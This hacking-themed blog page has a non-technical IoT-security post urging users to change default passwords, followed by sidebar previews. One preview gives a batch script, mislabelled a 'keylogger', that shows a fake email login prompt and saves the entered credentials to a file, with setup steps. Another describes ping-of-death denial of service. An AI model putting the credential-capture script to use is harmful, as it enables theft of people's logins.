Skip to main content

How to hack IO devices in less than 5 minutes

The world we live in, everything that surrounds us is now vulnerable to hackers. From your microwave to security cameras in your office, all of these can be hacked and used to do malicious things you can’t imagine.

As of now, we have 6.4 billion IoT devices and that number will reach 20 billion by the year 2020. This is the reason why security researchers are urging us to take security of IoT devices seriously, and my friend, they are soo right.

Of Course they are people who will say that it is already late as they consider the huge and massive DDoS attacks which have attacked KrebsOnSecurity, OVH, and just recently Dyn. All of these attacks used botnets of unsecured IoT devices.

But hey, hijacking IoT devices for DDoSing is only one of many ways attackers are going to use the affected IoT devices.

Are IoT Devices the Weak Spots of Enterprise networks ?

IoT devices are not just the points of attacks, they are the entry points hackers use to further attack the enterprise or even steal sensitive information. The best thing in this for hackers is that they can do all of this and still get away unnoticed.

Using the service of famous hacker named Samy Kamkar, ForeScout says that it normally takes an attacker less than three minutes to hack an IoT device.

In most of these scenarios, the problem is in the continued use of default passwords for the device’s management interface (It’s 2016 guys please be responsible and use strong passwords). Even though the device is not exposed to the Internet, sysadmins have to take the responsibility and change the default passwords.

In fact, one of the best security advice is to change the default password of any device, not necessarily IoT equipment.

Comments

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file w...

Perform cmd death attack

 A ping packet can also be malformed to perform denial of service attack by sending continuous ping packets to the target IP address. A continuous ping will cause buffer overflow at the target system and will cause the target system to crash.  We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes. If we look at the basic level, then a ping packet is generally of size 56 bytes or 84 bytes (including IP header as well). However, a ping packet can also be made as large as up to 65536 bytes. Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack. How Ping of Death attack works? Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent f...

What is DNS

D NS stands for Domain Name System is used to as the medium to translate domain names to their respective IP addresses when a client initiates a request query. DNS stores the database of all the domain names and their IP addresses which are registered on the network. Most of us are quite familiar with the term DNS or Domain Name System. DNS can be thought of as an attendance register for various websites present over the internet. In the case of DNS, it maintains the database of all the websites Domain Names and their IP (Internet Protocol) addresses that are operational all over the world. Historical Notes The origins of DNS date back to the time of the ARPANET  when there were only a few computers to get an entry in the database. A HOSTS.TXT file was maintained by Stanford Research Institute, which constituted the data of all the machines, and was copied by all the host machines to remain updated. Jon Postel from the Information Sciences Institute requested Pau...